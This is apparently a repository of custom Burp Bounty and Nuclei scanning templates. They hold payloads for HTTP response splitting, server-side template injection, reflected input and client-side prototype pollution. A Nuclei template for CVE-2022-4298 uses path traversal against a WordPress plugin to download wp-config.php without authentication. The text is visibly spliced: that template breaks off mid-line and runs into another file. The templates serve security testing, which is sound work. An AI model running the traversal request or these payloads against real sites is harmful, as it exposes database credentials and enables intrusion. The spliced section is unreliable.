├── BurpBounty ├── BlindXSS_rs0n_Append_double-close.bb ├── BlindXSS_rs0n_Append_no-close.bb ├── BlindXSS_rs0n_Append_single-close.bb ├── BlindXSS_rs0n_Insert_double-close.bb ├── BlindXSS_rs0n_Insert_no-close.bb ├── BlindXSS_rs0n_Insert_single-close.bb ├── BlindXSS_rs0n_Replace_double-close.bb ├── BlindXSS_rs0n_Replace_no-close.bb ├── BlindXSS_rs0n_Replace_single-close.bb ├── HTTP_Response_Splitting.bb ├── ReflectedValue_rs0n_Append.bb ├── ReflectedValue_rs0n_Insert.bb ├── ReflectedValue_rs0n_Replace.bb ├── SSTI_rs0n_Append.bb ├── SSTI_rs0n_Insert.bb └── SSTI_rs0n_Replace.bb ├── Nuclei ├── CVE-2022-4298.yaml ├── MobileIron.yaml └── headless │ ├── cspp-bracket-firstparam.yaml │ ├── cspp-bracket.yaml │ ├── cspp-constructor-bracket-firstparam.yaml │ ├── cspp-constructor-bracket.yaml │ ├── cspp-constructor-dot-firstparam.yaml │ ├── cspp-constructor-dot.yaml │ ├── cspp-dot-firstparam.yaml │ └── cspp-dot.yaml └── README.md /BurpBounty/HTTP_Response_Splitting.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "Name": "HTTP_Response_Splitting", 4 | "Enabled": true, 5 | "Scanner": 1, 6 | "Author": "@Xer0Days", 7 | "Payloads": [ 8 | "INJECTX%0d%0aSet-Cookie:INJECTX123;%0d%0a", 9 | "INJECTX%0aSet-Cookie:INJECTX123;%0a", 10 | "INJECTX\\u{0120}HTTP/1.1\\u{010D}\\u{010A}Host:\\u{0120}crowdshield.com\\u{010D}\\u{010A}\\u{010D}\\u{010A}GET\\u{0120}/.injectx/r.php?http_split" 11 | ], 12 | "Encoder": [], 13 | "UrlEncode": false, 14 | "CharsToUrlEncode": "", 15 | "Grep": [ 16 | "true,Or,Set-Cookie: INJECTX123", 17 | "true,Or,Set-Cookie:INJECTX123" 18 | ], 19 | "Tags": [ 20 | "All" 21 | ], 22 | "PayloadResponse": false, 23 | "NotResponse": false, 24 | "TimeOut1": "", 25 | "TimeOut2": "", 26 | "isTime": false, 27 | "contentLength": "", 28 | "iscontentLength": false, 29 | "CaseSensitive": false, 30 | "ExcludeHTTP": false, 31 | "OnlyHTTP": true, 32 | "IsContentType": false, 33 | "ContentType": "", 34 | "HttpResponseCode": "", 35 | 
"NegativeCT": false, 36 | "IsResponseCode": false, 37 | "ResponseCode": "", 38 | "NegativeRC": false, 39 | "urlextension": "", 40 | "isurlextension": false, 41 | "NegativeUrlExtension": false, 42 | "MatchType": 1, 43 | "Scope": 0, 44 | "RedirType": 0, 45 | "MaxRedir": 0, 46 | "payloadPosition": 1, 47 | "payloadsFile": "", 48 | "grepsFile": "", 49 | "IssueName": "HTTP_Response_Splitting", 50 | "IssueSeverity": "Medium", 51 | "IssueConfidence": "Certain", 52 | "IssueDetail": "", 53 | "RemediationDetail": "", 54 | "IssueBackground": "", 55 | "RemediationBackground": "", 56 | "Header": [], 57 | "VariationAttributes": [], 58 | "InsertionPointType": [ 59 | 65, 60 | 36, 61 | 1, 62 | 6, 63 | 5, 64 | 64, 65 | 0, 66 | 3, 67 | 4 68 | ], 69 | "Scanas": false, 70 | "Scantype": 0, 71 | "pathDiscovery": false 72 | } 73 | ] -------------------------------------------------------------------------------- /BurpBounty/ReflectedValue_rs0n_Append.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "ReflectedValue_rs0n_Append", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,rs0n\"\u003e" 10 | ], 11 | "Encoder": [], 12 | "UrlEncode": false, 13 | "CharsToUrlEncode": "", 14 | "Grep": [ 15 | "true,,rs0n\"\u003e" 16 | ], 17 | "Tags": [ 18 | "All" 19 | ], 20 | "PayloadResponse": false, 21 | "NotResponse": false, 22 | "TimeOut1": "", 23 | "TimeOut2": "", 24 | "isTime": false, 25 | "contentLength": "", 26 | "iscontentLength": false, 27 | "CaseSensitive": false, 28 | "ExcludeHTTP": true, 29 | "OnlyHTTP": false, 30 | "IsContentType": false, 31 | "ContentType": "", 32 | "HttpResponseCode": "", 33 | "NegativeCT": false, 34 | "IsResponseCode": false, 35 | "ResponseCode": "", 36 | "NegativeRC": false, 37 | "urlextension": "", 38 | "isurlextension": false, 39 | "NegativeUrlExtension": false, 40 | "MatchType": 1, 41 | "Scope": 0, 42 | "RedirType": 4, 43 | "MaxRedir": 0, 44 | 
"payloadPosition": 2, 45 | "payloadsFile": "", 46 | "grepsFile": "", 47 | "IssueName": "Reflected Value", 48 | "IssueSeverity": "Information", 49 | "IssueConfidence": "Certain", 50 | "IssueDetail": "User-controlled input is being reflected in the server\u0027s response.", 51 | "RemediationDetail": "", 52 | "IssueBackground": "", 53 | "RemediationBackground": "", 54 | "Header": [], 55 | "VariationAttributes": [], 56 | "InsertionPointType": [ 57 | 18, 58 | 65, 59 | 32, 60 | 36, 61 | 7, 62 | 1, 63 | 2, 64 | 6, 65 | 33, 66 | 5, 67 | 35, 68 | 34, 69 | 64, 70 | 0, 71 | 3, 72 | 4, 73 | 37, 74 | 127, 75 | 65, 76 | 32, 77 | 36, 78 | 7, 79 | 1, 80 | 2, 81 | 6, 82 | 33, 83 | 5, 84 | 35, 85 | 34, 86 | 64, 87 | 0, 88 | 3, 89 | 4, 90 | 37, 91 | 127 92 | ], 93 | "Scanas": false, 94 | "Scantype": 0, 95 | "pathDiscovery": false 96 | } 97 | ] -------------------------------------------------------------------------------- /BurpBounty/ReflectedValue_rs0n_Insert.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "ReflectedValue_rs0n_Insert", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,rs0n\"\u003e" 10 | ], 11 | "Encoder": [], 12 | "UrlEncode": false, 13 | "CharsToUrlEncode": "", 14 | "Grep": [ 15 | "true,,rs0n\"\u003e" 16 | ], 17 | "Tags": [ 18 | "All" 19 | ], 20 | "PayloadResponse": false, 21 | "NotResponse": false, 22 | "TimeOut1": "", 23 | "TimeOut2": "", 24 | "isTime": false, 25 | "contentLength": "", 26 | "iscontentLength": false, 27 | "CaseSensitive": false, 28 | "ExcludeHTTP": true, 29 | "OnlyHTTP": false, 30 | "IsContentType": false, 31 | "ContentType": "", 32 | "HttpResponseCode": "", 33 | "NegativeCT": false, 34 | "IsResponseCode": false, 35 | "ResponseCode": "", 36 | "NegativeRC": false, 37 | "urlextension": "", 38 | "isurlextension": false, 39 | "NegativeUrlExtension": false, 40 | "MatchType": 1, 41 | "Scope": 0, 42 | "RedirType": 4, 43 | 
"MaxRedir": 0, 44 | "payloadPosition": 3, 45 | "payloadsFile": "", 46 | "grepsFile": "", 47 | "IssueName": "Reflected Value", 48 | "IssueSeverity": "Information", 49 | "IssueConfidence": "Certain", 50 | "IssueDetail": "User-controlled input is being reflected in the server\u0027s response.", 51 | "RemediationDetail": "", 52 | "IssueBackground": "", 53 | "RemediationBackground": "", 54 | "Header": [], 55 | "VariationAttributes": [], 56 | "InsertionPointType": [ 57 | 18, 58 | 65, 59 | 32, 60 | 36, 61 | 7, 62 | 1, 63 | 2, 64 | 6, 65 | 33, 66 | 5, 67 | 35, 68 | 34, 69 | 64, 70 | 0, 71 | 3, 72 | 4, 73 | 37, 74 | 127, 75 | 65, 76 | 32, 77 | 36, 78 | 7, 79 | 1, 80 | 2, 81 | 6, 82 | 33, 83 | 5, 84 | 35, 85 | 34, 86 | 64, 87 | 0, 88 | 3, 89 | 4, 90 | 37, 91 | 127 92 | ], 93 | "Scanas": false, 94 | "Scantype": 0, 95 | "pathDiscovery": false 96 | } 97 | ] -------------------------------------------------------------------------------- /BurpBounty/ReflectedValue_rs0n_Replace.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "ReflectedValue_rs0n_Replace", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,rs0n\"\u003e" 10 | ], 11 | "Encoder": [], 12 | "UrlEncode": false, 13 | "CharsToUrlEncode": "", 14 | "Grep": [ 15 | "true,,rs0n\"\u003e" 16 | ], 17 | "Tags": [ 18 | "All" 19 | ], 20 | "PayloadResponse": false, 21 | "NotResponse": false, 22 | "TimeOut1": "", 23 | "TimeOut2": "", 24 | "isTime": false, 25 | "contentLength": "", 26 | "iscontentLength": false, 27 | "CaseSensitive": false, 28 | "ExcludeHTTP": true, 29 | "OnlyHTTP": false, 30 | "IsContentType": false, 31 | "ContentType": "", 32 | "HttpResponseCode": "", 33 | "NegativeCT": false, 34 | "IsResponseCode": false, 35 | "ResponseCode": "", 36 | "NegativeRC": false, 37 | "urlextension": "", 38 | "isurlextension": false, 39 | "NegativeUrlExtension": false, 40 | "MatchType": 1, 41 | "Scope": 0, 42 | 
"RedirType": 4, 43 | "MaxRedir": 0, 44 | "payloadPosition": 1, 45 | "payloadsFile": "", 46 | "grepsFile": "", 47 | "IssueName": "Reflected Value", 48 | "IssueSeverity": "Information", 49 | "IssueConfidence": "Certain", 50 | "IssueDetail": "User-controlled input is being reflected in the server\u0027s response.", 51 | "RemediationDetail": "", 52 | "IssueBackground": "", 53 | "RemediationBackground": "", 54 | "Header": [], 55 | "VariationAttributes": [], 56 | "InsertionPointType": [ 57 | 18, 58 | 65, 59 | 32, 60 | 36, 61 | 7, 62 | 1, 63 | 2, 64 | 6, 65 | 33, 66 | 5, 67 | 35, 68 | 34, 69 | 64, 70 | 0, 71 | 3, 72 | 4, 73 | 37, 74 | 127, 75 | 65, 76 | 32, 77 | 36, 78 | 7, 79 | 1, 80 | 2, 81 | 6, 82 | 33, 83 | 5, 84 | 35, 85 | 34, 86 | 64, 87 | 0, 88 | 3, 89 | 4, 90 | 37, 91 | 127 92 | ], 93 | "Scanas": false, 94 | "Scantype": 0, 95 | "pathDiscovery": false 96 | } 97 | ] -------------------------------------------------------------------------------- /BurpBounty/SSTI_rs0n_Append.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "SSTI_rs0n_Append", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,{{349*349}}", 10 | "true,${349*349}", 11 | "true,\u003c%\u003d 349*349 %\u003e", 12 | "true,${{349*349}}", 13 | "true,#{349*349}" 14 | ], 15 | "Encoder": [], 16 | "UrlEncode": false, 17 | "CharsToUrlEncode": "", 18 | "Grep": [ 19 | "true,,121801" 20 | ], 21 | "Tags": [ 22 | "All" 23 | ], 24 | "PayloadResponse": false, 25 | "NotResponse": false, 26 | "TimeOut1": "", 27 | "TimeOut2": "", 28 | "isTime": false, 29 | "contentLength": "", 30 | "iscontentLength": false, 31 | "CaseSensitive": false, 32 | "ExcludeHTTP": false, 33 | "OnlyHTTP": false, 34 | "IsContentType": false, 35 | "ContentType": "", 36 | "HttpResponseCode": "", 37 | "NegativeCT": false, 38 | "IsResponseCode": false, 39 | "ResponseCode": "", 40 | "NegativeRC": false, 41 | "urlextension": "", 42 | 
"isurlextension": false, 43 | "NegativeUrlExtension": false, 44 | "MatchType": 1, 45 | "Scope": 0, 46 | "RedirType": 0, 47 | "MaxRedir": 0, 48 | "payloadPosition": 2, 49 | "payloadsFile": "", 50 | "grepsFile": "", 51 | "IssueName": "Server-Side Template Injection (SSTI)", 52 | "IssueSeverity": "High", 53 | "IssueConfidence": "Firm", 54 | "IssueDetail": "A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.\n\nTemplate engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.\n\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", 55 | "RemediationDetail": "", 56 | "IssueBackground": "", 57 | "RemediationBackground": "", 58 | "Header": [], 59 | "VariationAttributes": [], 60 | "InsertionPointType": [ 61 | 18, 62 | 65, 63 | 32, 64 | 36, 65 | 7, 66 | 1, 67 | 2, 68 | 6, 69 | 33, 70 | 5, 71 | 35, 72 | 34, 73 | 64, 74 | 0, 75 | 3, 76 | 4, 77 | 37, 78 | 127, 79 | 65, 80 | 32, 81 | 36, 82 | 7, 83 | 1, 84 | 2, 85 | 6, 86 | 33, 87 | 5, 88 | 35, 89 | 34, 90 | 64, 91 | 0, 92 | 3, 93 | 4, 94 | 37, 95 | 127 96 | ], 97 | "Scanas": false, 98 | "Scantype": 0, 99 | "pathDiscovery": false 100 | } 101 | ] -------------------------------------------------------------------------------- /BurpBounty/SSTI_rs0n_Insert.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "SSTI_rs0n_Insert", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,{{349*349}}", 10 | "true,${349*349}", 11 | 
"true,\u003c%\u003d 349*349 %\u003e", 12 | "true,${{349*349}}", 13 | "true,#{349*349}" 14 | ], 15 | "Encoder": [], 16 | "UrlEncode": false, 17 | "CharsToUrlEncode": "", 18 | "Grep": [ 19 | "true,,121801" 20 | ], 21 | "Tags": [ 22 | "All" 23 | ], 24 | "PayloadResponse": false, 25 | "NotResponse": false, 26 | "TimeOut1": "", 27 | "TimeOut2": "", 28 | "isTime": false, 29 | "contentLength": "", 30 | "iscontentLength": false, 31 | "CaseSensitive": false, 32 | "ExcludeHTTP": false, 33 | "OnlyHTTP": false, 34 | "IsContentType": false, 35 | "ContentType": "", 36 | "HttpResponseCode": "", 37 | "NegativeCT": false, 38 | "IsResponseCode": false, 39 | "ResponseCode": "", 40 | "NegativeRC": false, 41 | "urlextension": "", 42 | "isurlextension": false, 43 | "NegativeUrlExtension": false, 44 | "MatchType": 1, 45 | "Scope": 0, 46 | "RedirType": 0, 47 | "MaxRedir": 0, 48 | "payloadPosition": 1, 49 | "payloadsFile": "", 50 | "grepsFile": "", 51 | "IssueName": "Server-Side Template Injection (SSTI)", 52 | "IssueSeverity": "High", 53 | "IssueConfidence": "Firm", 54 | "IssueDetail": "A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.\n\nTemplate engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. 
This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.\n\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", 55 | "RemediationDetail": "", 56 | "IssueBackground": "", 57 | "RemediationBackground": "", 58 | "Header": [], 59 | "VariationAttributes": [], 60 | "InsertionPointType": [ 61 | 18, 62 | 65, 63 | 32, 64 | 36, 65 | 7, 66 | 1, 67 | 2, 68 | 6, 69 | 33, 70 | 5, 71 | 35, 72 | 34, 73 | 64, 74 | 0, 75 | 3, 76 | 4, 77 | 37, 78 | 127, 79 | 65, 80 | 32, 81 | 36, 82 | 7, 83 | 1, 84 | 2, 85 | 6, 86 | 33, 87 | 5, 88 | 35, 89 | 34, 90 | 64, 91 | 0, 92 | 3, 93 | 4, 94 | 37, 95 | 127 96 | ], 97 | "Scanas": false, 98 | "Scantype": 0, 99 | "pathDiscovery": false 100 | } 101 | ] -------------------------------------------------------------------------------- /BurpBounty/SSTI_rs0n_Replace.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "SSTI_rs0n_Replace", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,{{349*349}}", 10 | "true,${349*349}", 11 | "true,\u003c%\u003d 349*349 %\u003e", 12 | "true,${{349*349}}", 13 | "true,#{349*349}" 14 | ], 15 | "Encoder": [], 16 | "UrlEncode": false, 17 | "CharsToUrlEncode": "", 18 | "Grep": [ 19 | "true,,121801" 20 | ], 21 | "Tags": [ 22 | "All" 23 | ], 24 | "PayloadResponse": false, 25 | "NotResponse": false, 26 | "TimeOut1": "", 27 | "TimeOut2": "", 28 | "isTime": false, 29 | "contentLength": "", 30 | "iscontentLength": false, 31 | "CaseSensitive": false, 32 | "ExcludeHTTP": false, 33 | "OnlyHTTP": false, 34 | "IsContentType": false, 35 | "ContentType": "", 36 | "HttpResponseCode": "", 37 | "NegativeCT": false, 38 | "IsResponseCode": false, 39 | "ResponseCode": "", 40 | "NegativeRC": false, 41 | "urlextension": "", 42 | "isurlextension": false, 43 | "NegativeUrlExtension": false, 44 
| "MatchType": 1, 45 | "Scope": 0, 46 | "RedirType": 0, 47 | "MaxRedir": 0, 48 | "payloadPosition": 1, 49 | "payloadsFile": "", 50 | "grepsFile": "", 51 | "IssueName": "Server-Side Template Injection (SSTI)", 52 | "IssueSeverity": "High", 53 | "IssueConfidence": "Firm", 54 | "IssueDetail": "A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.\n\nTemplate engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.\n\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", 55 | "RemediationDetail": "", 56 | "IssueBackground": "", 57 | "RemediationBackground": "", 58 | "Header": [], 59 | "VariationAttributes": [], 60 | "InsertionPointType": [ 61 | 18, 62 | 65, 63 | 32, 64 | 36, 65 | 7, 66 | 1, 67 | 2, 68 | 6, 69 | 33, 70 | 5, 71 | 35, 72 | 34, 73 | 64, 74 | 0, 75 | 3, 76 | 4, 77 | 37, 78 | 127, 79 | 65, 80 | 32, 81 | 36, 82 | 7, 83 | 1, 84 | 2, 85 | 6, 86 | 33, 87 | 5, 88 | 35, 89 | 34, 90 | 64, 91 | 0, 92 | 3, 93 | 4, 94 | 37, 95 | 127 96 | ], 97 | "Scanas": false, 98 | "Scantype": 0, 99 | "pathDiscovery": false 100 | } 101 | ] -------------------------------------------------------------------------------- /Nuclei/CVE-2022-4298.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2022-4298 2 | 3 | info: 4 | name: Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download 5 | author: rs0n 6 | severity: critical 7 | description: | 8 | The Wholesale Market WordPress plugin before 2.2.1 does not have authorisation check, as well as does not 
validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server. 9 | reference: 10 | - https://wpscan.com/vulnerability/7485ad23-6ea4-4018-88b1-174312a0a478 11 | classification: 12 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 13 | cvss-score: 10 14 | cve-id: CVE-2022-4298 15 | cwe-id: CWE-22 16 | metadata: 17 | verified: "true" 18 | tags: directory-traversal,wholesale-market,wpscan,cve,cve2022,whole,wordpress,wp-plugin,wp 19 | 20 | requests: 21 | - raw: 22 | - | 23 | GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv HTTP/1.1 24 | Host: {{Hostname}} 25 | - | 26 | @timeout: 10s 27 | GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1 28 | Host: {{Hostname}} 29 | matchers-condition: and 30 | matchers: 31 | - type: dsl 32 | dsl: 33 | - "len(body)>2 && status_code==200" 34 | 35 | - type: word 36 | words: 37 | - " { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-bracket.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-bracket 2 | 3 | info: 4 | name: Prototype Pollution Check Using Bracket Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&__proto__[rs0n]=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, 
prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&__proto__[rs0n]=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-bracket-firstparam.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-bracket-constructor-firstparam 2 | 3 | info: 4 | name: Prototype Pollution Check Using Constructor Bracket Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}?constructor[prototype][rs0n]=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}?constructor[prototype][rs0n]=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-bracket.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-bracket-constructor 2 | 3 | info: 4 | name: Prototype Pollution Check Using Constructor Bracket Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | 
Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&constructor[prototype][rs0n]=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&constructor[prototype][rs0n]=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-dot-firstparam.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot-constructor-firstparam 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}?constructor.prototype.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}?constructor.prototype.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | 
words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-dot.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot-constructor 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&constructor.prototype.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&constructor.prototype.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-dot-firstparam.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot-firstparam 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}?__proto__.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 
14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}?__proto__.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-dot.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&__proto__.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&__proto__.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Custom vulnerability scanning templates 2 | 3 | Remember to replace my xss-hunter url with your own, otherwise I'll steal your bounty ;) 4 | --------------------------------------------------------------------------------